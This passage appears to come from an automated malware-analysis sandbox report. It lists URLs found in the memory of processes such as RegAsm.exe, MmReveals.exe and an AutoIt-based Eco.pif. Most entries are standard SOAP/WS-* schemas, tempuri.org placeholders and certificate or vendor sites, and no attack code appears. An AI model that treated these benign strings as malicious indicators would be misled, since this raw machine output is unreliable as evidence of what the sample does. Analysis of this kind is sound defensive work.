                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.000000000289D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.000000000289D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                    Source: Setup.exe, 00000002.00000003.1761393859.00000000022D6000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000003.1755405797.0000000002586000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.autodesk.com/
                    Source: Setup.exe, 00000002.00000003.1652253190.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000003.1664466450.00000000034B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.autodesk.com/0http://www.autodesk.com/0http://www.autodesk.com/
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.dr String found in binary or memory: http://www.autoitscript.com/autoit3/0
                    Source: MmReveals.exe, 00000003.00000003.1675095566.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, Eco.pif, 0000000E.00000000.1699641380.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp, Eco.pif.5.dr, Glasses.3.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.dr String found in binary or memory: http://www.digicert.com/CPS0
                    Source: Setup.exe, 00000002.00000003.1652253190.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.1761393859.000000000227D000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000003.1664466450.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000003.1755405797.00000000024DD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.dk-soft.org/
